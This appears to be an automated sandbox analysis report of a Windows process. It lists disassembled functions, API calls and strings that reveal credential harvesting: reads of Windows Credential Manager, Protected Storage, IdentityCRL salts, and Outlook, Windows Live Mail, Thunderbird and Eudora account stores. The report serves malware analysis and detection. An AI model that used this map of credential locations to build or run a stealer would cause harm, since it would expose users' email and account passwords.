34020 40f645 memcpy 34018->34020 34019->34016 34020->34019 34046 40466b _mbscpy 34021->34046 34023 40f6fa 34024 4045db 7 API calls 34023->34024 34025 40f708 34024->34025 34026 404734 3 API calls 34025->34026 34033 40f7e2 34025->34033 34028 40f715 34026->34028 34027 404656 FreeLibrary 34029 40f7f1 34027->34029 34030 40f71d CredReadA 34028->34030 34028->34033 34031 404785 FreeLibrary 34029->34031 34030->34033 34034 40f734 34030->34034 34032 40f7fc 34031->34032 34032->33879 34033->34027 34034->34033 34035 40f797 WideCharToMultiByte 34034->34035 34036 40f7b8 strlen 34035->34036 34037 40f7d9 LocalFree 34035->34037 34036->34037 34038 40f7c8 _mbscpy 34036->34038 34037->34033 34038->34037 34039->33879 34041 4078e6 34040->34041 34042 4078c7 _mbsnbcat 34041->34042 34043 4078ea 34041->34043 34042->34041 34043->34003 34044->34011 34045->34014 34046->34023 34060 410a9c RegOpenKeyExA 34047->34060 34049 40381a 34049->33887 34058 4021b6 memset 34049->34058 34050 44458b 34050->34049 34061 410add RegQueryValueExA 34050->34061 34052 4445a4 34053 4445dc RegCloseKey 34052->34053 34062 410add RegQueryValueExA 34052->34062 34053->34049 34055 4445c1 34055->34053 34063 444879 30 API calls 34055->34063 34057 4445da 34057->34053 34058->33889 34059->33887 34060->34050 34061->34052 34062->34055 34063->34057 34064->33910 34066 4075c9 34065->34066 34067 4075bb _mbscat 34065->34067 34068 444212 34066->34068 34067->34066 34085 407e9d 34068->34085 34071 44424d 34072 444274 34071->34072 34073 444258 34071->34073 34093 407ef8 34071->34093 34074 407e9d 9 API calls 34072->34074 34110 444196 52 API calls 34073->34110 34081 4442a0 34074->34081 34076 407ef8 9 API calls 34076->34081 34077 4442ce 34107 407f90 34077->34107 34081->34076 34081->34077 34083 444212 65 API calls 34081->34083 34103 407e62 34081->34103 34082 407f90 FindClose 34084 4442e4 34082->34084 34083->34081 34084->33932 34086 407f90 FindClose 34085->34086 34087 407eaa 34086->34087 34088 406f06 2 API calls 34087->34088 34089 407ebd strlen strlen 34088->34089 34090 407ee1 34089->34090 34091 407eea 34089->34091 34111 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34111 34091->34071 34094 407f03 FindFirstFileA 34093->34094 34095 407f24 FindNextFileA 34093->34095 34096 407f3f 34094->34096 34097 407f46 strlen strlen 34095->34097 34098 407f3a 34095->34098 34096->34097 34101 407f7f 34096->34101 34099 407f76 34097->34099 34097->34101 34100 407f90 FindClose 34098->34100 34112 4070e3 strlen _mbscat _mbscpy _mbscat 34099->34112 34100->34096 34101->34071 34104 407e94 34103->34104 34105 407e6c strcmp 34103->34105 34104->34081 34105->34104 34106 407e83 strcmp 34105->34106 34106->34104 34108 407fa3 34107->34108 34109 407f99 FindClose 34107->34109 34108->34082 34109->34108 34110->34071 34111->34091 34112->34101 34113->33536 34114->33540 34115->33546 34116->33547 34117->33553 34118->33550 34119->33545 34128 411853 RtlInitializeCriticalSection memset 34129 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34303 40a256 13 API calls 34305 432e5b 17 API calls 34307 43fa5a 20 API calls 34131 401060 41 API calls 34310 427260 CloseHandle memset memset 33210 410c68 FindResourceA 33211 410c81 SizeofResource 33210->33211 33212 410cae 33210->33212 33211->33212 33213 410c92 LoadResource 33211->33213 33213->33212 33214 410ca0 LockResource 33213->33214 33214->33212 34312 405e69 14 API calls 34136 433068 15 API calls __fprintf_l 34314 414a6d 18 API calls 34315 43fe6f 134 API calls 34138 424c6d 15 API calls __fprintf_l 34316 426741 19 API calls 34140 440c70 17 API calls 34141 443c71 44 API calls 34144 427c79 24 API calls 34319 416e7e memset __fprintf_l 34148 42800b 47 API calls 34149 425115 85 API calls __fprintf_l 34322 41960c 61 API calls 34150 43f40c 122 API calls __fprintf_l 34153 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34154 43f81a 20 API calls 34156 414c20 memset memset 34157 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34326 414625 18 API calls 34327 404225 modf 34328 403a26 strlen WriteFile 34330 40422a 12 API calls 34334 427632 memset memset memcpy 34335 40ca30 59 API calls 34336 404235 26 API calls 34158 42ec34 61 API calls __fprintf_l 34159 425115 76 API calls __fprintf_l 34337 425115 77 API calls __fprintf_l 34339 44223a 38 API calls 34165 43183c 112 API calls 34340 44b2c5 _onexit __dllonexit 34345 42a6d2 memcpy __allrem 34167 405cda 65 API calls 34353 43fedc 138 API calls 34354 4116e1 16 API calls __fprintf_l 34170 4244e6 19 API calls 34172 42e8e8 127 API calls __fprintf_l 34173 4118ee RtlLeaveCriticalSection 34359 43f6ec 22 API calls 34175 425115 119 API calls __fprintf_l 33200 410cf3 EnumResourceNamesA 34362 4492f0 memcpy memcpy 34364 43fafa 18 API calls 34366 4342f9 15 API calls __fprintf_l 34176 4144fd 19 API calls 34368 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34369 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34372 443a84 _mbscpy 34374 43f681 17 API calls 34179 404487 22 API calls 34376 415e8c 16 API calls __fprintf_l 34183 411893 RtlDeleteCriticalSection __fprintf_l 34184 41a492 42 API calls 34380 403e96 34 API calls 34381 410e98 memset SHGetPathFromIDList SendMessageA 34186 426741 109 API calls __fprintf_l 34187 4344a2 18 API calls 34188 4094a2 10 API calls 34190 4108a4 memcpy UuidFromStringA UuidFromStringA UuidFromStringA memcpy 34384 4116a6 15 API calls __fprintf_l 34385 43f6a4 17 API calls 34386 440aa3 20 API calls 34388 427430 45 API calls 34192 4090b0 7 API calls 34193 4148b0 15 API calls 34195 4118b4 RtlEnterCriticalSection 34196 4014b7 CreateWindowExA 34197 40c8b8 19 API calls 34199 4118bf RtlTryEnterCriticalSection 34393 42434a 18 API calls __fprintf_l 34395 405f53 12 API calls 34207 43f956 59 API calls 34209 40955a 17 API calls 34210 428561 36 API calls 34211 409164 7 API calls 34399 404366 19 API calls 34403 40176c ExitProcess 34406 410777 42 API calls 34216 40dd7b 51 API calls 34217 425d7c 16 API calls __fprintf_l 34408 43f6f0 25 API calls 34409 42db01 22 API calls 34218 412905 15 API calls __fprintf_l 34410 403b04 54 API calls 34411 405f04 SetDlgItemTextA GetDlgItemTextA 34412 44b301 ??3@YAXPAX 34415 4120ea 14 API calls 3 library calls 34416 40bb0a 8 API calls 34418 413f11 strcmp 34222 434110 17 API calls __fprintf_l 34225 425115 108 API calls __fprintf_l 34419 444b11 _onexit 34227 425115 76 API calls __fprintf_l 34230 429d19 10 API calls 34422 444b1f __dllonexit 34423 409f20 _strcmpi 34232 42b927 31 API calls 34426 433f26 19 API calls __fprintf_l 34427 44b323 FreeLibrary 34428 427f25 46 API calls 34429 43ff2b 17 API calls 34430 43fb30 19 API calls 34239 414d36 16 API calls 34241 40ad38 7 API calls 34432 433b38 16 API calls __fprintf_l 34433 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34245 426741 21 API calls 34246 40c5c3 125 API calls 34248 43fdc5 17 API calls 34434 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34251 4161cb memcpy memcpy memcpy memcpy 33215 44b3cf 33216 44b3e6 33215->33216 33218 44b454 33215->33218 33216->33218 33222 44b40e 33216->33222 33219 44b405 33219->33218 33220 44b435 VirtualProtect 33219->33220 33220->33218 33221 44b444 VirtualProtect 33220->33221 33221->33218 33223 44b413 33222->33223 33225 44b454 33223->33225 33229 44b42b 33223->33229 33226 44b41c 33226->33225 33227 44b435 VirtualProtect 33226->33227 33227->33225 33228 44b444 VirtualProtect 33227->33228 33228->33225 33230 44b431 33229->33230 33231 44b435 VirtualProtect 33230->33231 33233 44b454 33230->33233 33232 44b444 VirtualProtect 33231->33232 33231->33233 33232->33233 34439 43ffc8 18 API calls 34252 4281cc 15 API calls __fprintf_l 34441 4383cc 110 API calls __fprintf_l 34253 4275d3 41 API calls 34442 4153d3 22 API calls __fprintf_l 34254 444dd7 _XcptFilter 34447 4013de 15 API calls 34449 425115 111 API calls __fprintf_l 34450 43f7db 18 API calls 34453 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34256 4335ee 16 API calls __fprintf_l 34455 429fef 11 API calls 34257 444deb _exit _c_exit 34456 40bbf0 138 API calls 34260 425115 79 API calls __fprintf_l 34460 437ffa 22 API calls 34264 4021ff 14 API calls 34265 43f5fc 149 API calls 34461 40e381 9 API calls 34267 405983 40 API calls 34268 42b186 27 API calls __fprintf_l 34269 427d86 76 API calls 34270 403585 20 API calls 34272 42e58e 18 API calls __fprintf_l 34275 425115 75 API calls __fprintf_l 34277 401592 8 API calls 33201 410b92 33204 410a6b 33201->33204 33203 410bb2 33205 410a77 33204->33205 33206 410a89 GetPrivateProfileIntA 33204->33206 33209 410983 memset _itoa WritePrivateProfileStringA 33205->33209 33206->33203 33208 410a84 33208->33203 33209->33208 34465 434395 16 API calls 34279 441d9c memcmp 34467 43f79b 119 API calls 34280 40c599 43 API calls 34468 426741 87 API calls 34284 4401a6 21 API calls 34286 426da6 memcpy memset memset memcpy 34287 4335a5 15 API calls 34289 4299ab memset memset memcpy memset memset 34290 40b1ab 8 API calls 34473 425115 76 API calls __fprintf_l 34477 4113b2 18 API calls 2 library calls 34481 40a3b8 memset sprintf SendMessageA 33234 410bbc 33237 4109cf 33234->33237 33238 4109dc 33237->33238 33239 410a23 memset GetPrivateProfileStringA 33238->33239 33240 4109ea memset 33238->33240 33245 407646 strlen 33239->33245 33250 4075cd sprintf memcpy 33240->33250 33243 410a0c WritePrivateProfileStringA 33244 410a65 33243->33244 33246 40765a 33245->33246 33248 40765c 33245->33248 33246->33244 33247 4076a3 33247->33244 33248->33247 33251 40737c strtoul 33248->33251 33250->33243 33251->33248 34292 40b5bf memset memset _mbsicmp

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                      APIs
                                      • memset.MSVCRT ref: 0040832F
                                      • memset.MSVCRT ref: 00408343
                                      • memset.MSVCRT ref: 0040835F
                                      • memset.MSVCRT ref: 00408376
                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                      • strlen.MSVCRT ref: 004083E9
                                      • strlen.MSVCRT ref: 004083F8
                                      • memcpy.MSVCRT ref: 0040840A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                      • String ID: 5$H$O$b$i$}$}
                                      • API String ID: 1832431107-3760989150
                                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                      APIs
                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                      • strlen.MSVCRT ref: 00407F5C
                                      • strlen.MSVCRT ref: 00407F64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileFindstrlen$FirstNext
                                      • String ID: ACD
                                      • API String ID: 379999529-620537770
                                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 00401E8B
                                      • strlen.MSVCRT ref: 00401EA4
                                      • strlen.MSVCRT ref: 00401EB2
                                      • strlen.MSVCRT ref: 00401EF8
                                      • strlen.MSVCRT ref: 00401F06
                                      • memset.MSVCRT ref: 00401FB1
                                      • atoi.MSVCRT ref: 00401FE0
                                      • memset.MSVCRT ref: 00402003
                                      • sprintf.MSVCRT ref: 00402030
                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                      • memset.MSVCRT ref: 00402086
                                      • memset.MSVCRT ref: 0040209B
                                      • strlen.MSVCRT ref: 004020A1
                                      • strlen.MSVCRT ref: 004020AF
                                      • strlen.MSVCRT ref: 004020E2
                                      • strlen.MSVCRT ref: 004020F0
                                      • memset.MSVCRT ref: 00402018
                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                      • _mbscpy.MSVCRT ref: 00402177
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                      • API String ID: 1846531875-4223776976
                                      • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                      • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                      • API String ID: 745651260-375988210
                                      • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                      • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                      • _mbscpy.MSVCRT ref: 00403E54
                                      Strings
                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                      • PStoreCreateInstance, xrefs: 00403C44
                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                      • pstorec.dll, xrefs: 00403C30
                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                      • API String ID: 1197458902-317895162
                                      • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                      • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                      • memcpy.MSVCRT ref: 0040FBE4
                                      • memcpy.MSVCRT ref: 0040FBF9
                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                      • API String ID: 2768085393-2409096184
                                      • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                      • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 257 444c80-444c85 254->257 258 444c9f-444ca3 254->258 263 444d02-444d0d __setusermatherr 255->263 264 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->264 257->252 260 444c8c-444c93 257->260 258->252 261 444ca5-444ca7 258->261 260->252 265 444c95-444c9d 260->265 262 444cad-444cb0 261->262 262->255 263->264 268 444da4-444da7 264->268 269 444d6a-444d72 264->269 265->262 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                      • String ID:
                                      • API String ID: 3662548030-0
                                      • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                      • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0044430B
                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                      • memset.MSVCRT ref: 00444379
                                      • memset.MSVCRT ref: 00444394
                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                      • strlen.MSVCRT ref: 004443DB
                                      • _strcmpi.MSVCRT ref: 00444401
                                      Strings
                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                      • Store Root, xrefs: 004443A5
                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                      • API String ID: 832325562-2578778931
                                      • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                      • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                      APIs
                                      • memset.MSVCRT ref: 0040F567
                                      • memset.MSVCRT ref: 0040F57F
                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                      • memcpy.MSVCRT ref: 0040F652
                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                      • String ID:
